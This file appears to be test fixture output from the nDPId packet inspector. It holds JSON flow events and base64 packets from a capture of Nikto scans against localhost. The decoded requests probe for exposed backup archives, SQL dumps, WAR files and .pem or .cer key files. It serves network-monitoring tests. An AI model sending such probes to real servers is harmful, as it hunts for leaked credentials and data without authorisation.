+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277314,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":1,"flow_last_seen":1576420277314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277314,"pkt":"AAAAAAAAAAAAAAAACABFAADEBf5AAEAGNjR\/AAABfwAAAcS0H5ApMj1NA0MOSIAYAED+uAAAAQEICp1m\/WqdZv1qR0VUIC8xMjcwMC50YXIuZ3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277314,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277315,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":1,"flow_last_seen":1576420277315,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277315,"pkt":"AAAAAAAAAAAAAAAACABFAADC35NAAEAGXKB\/AAABfwAAAcS2H5BI6+ciGxVy6IAYAED+tgAAAQEICp1m\/WudZv1rR0VUIC8xLnRhci5sem1hIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277315,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277317,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":1,"flow_last_seen":1576420277317,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277317,"pkt":"AAAAAAAAAAAAAAAACABFAADCBO9AAEAGN0V\/AAABfwAAAcS4H5BQkTxdjeN4aIAYAED+tgAAAQEICp1m\/W2dZv1tR0VUIC8xLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277317,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277319,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":1,"flow_last_seen":1576420277319,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277319,"pkt":"AAAAAAAAAAAAAAAACABFAADAyGZAAEAGc89\/AAABfwAAAcS6H5BukfDWpxxv14AYAED+tAAAAQEICp1m\/W+dZv1vR0VUIC9zaXRlLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277319,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277321,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":1,"flow_last_seen":1576420277321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277321,"pkt":"AAAAAAAAAAAAAAAACABFAADAwiFAAEAGehR\/AAABfwAAAcS8H5DDVvqu6KD2KYAYAED+tAAAAQEICp1m\/XGdZv1xR0VUIC9zaXRlLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277321,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277322,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":1,"flow_last_seen":1576420277322,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277322,"pkt":"AAAAAAAAAAAAAAAACABFAADBuGlAAEAGg8t\/AAABfwAAAcS+H5BzjYDWLFz9IYAYAED+tQAAAQEICp1m\/XKdZv1yR0VUIC8xMjcuMC5jZXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277322,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277324,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":1,"flow_last_seen":1576420277324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277324,"pkt":"AAAAAAAAAAAAAAAACABFAADB11JAAEAGZOJ\/AAABfwAAAcTAH5DtMO\/kM\/E\/tYAYAED+tQAAAQEICp1m\/XSdZv10R0VUIC8xMjcuMC5jZXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277324,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277325,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":1,"flow_last_seen":1576420277325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277325,"pkt":"AAAAAAAAAAAAAAAACABFAAC96FRAAEAGU+R\/AAABfwAAAcTCH5AdeNDi26Tri4AYAED+sQAAAQEICp1m\/XWdZv11R0VUIC8wLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277325,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277326,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":1,"flow_last_seen":1576420277326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277326,"pkt":"AAAAAAAAAAAAAAAACABFAAC95+5AAEAGVEp\/AAABfwAAAcTEH5Cz199gOp5CH4AYAED+sQAAAQEICp1m\/XadZv12R0VUIC8wLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277326,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277328,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":1,"flow_last_seen":1576420277328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277328,"pkt":"AAAAAAAAAAAAAAAACABFAADAqSFAAEAGkxR\/AAABfwAAAcTGH5DtDpGsIyeJWoAYAED+tAAAAQEICp1m\/XidZv14R0VUIC8xMjcwLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277328,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277329,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
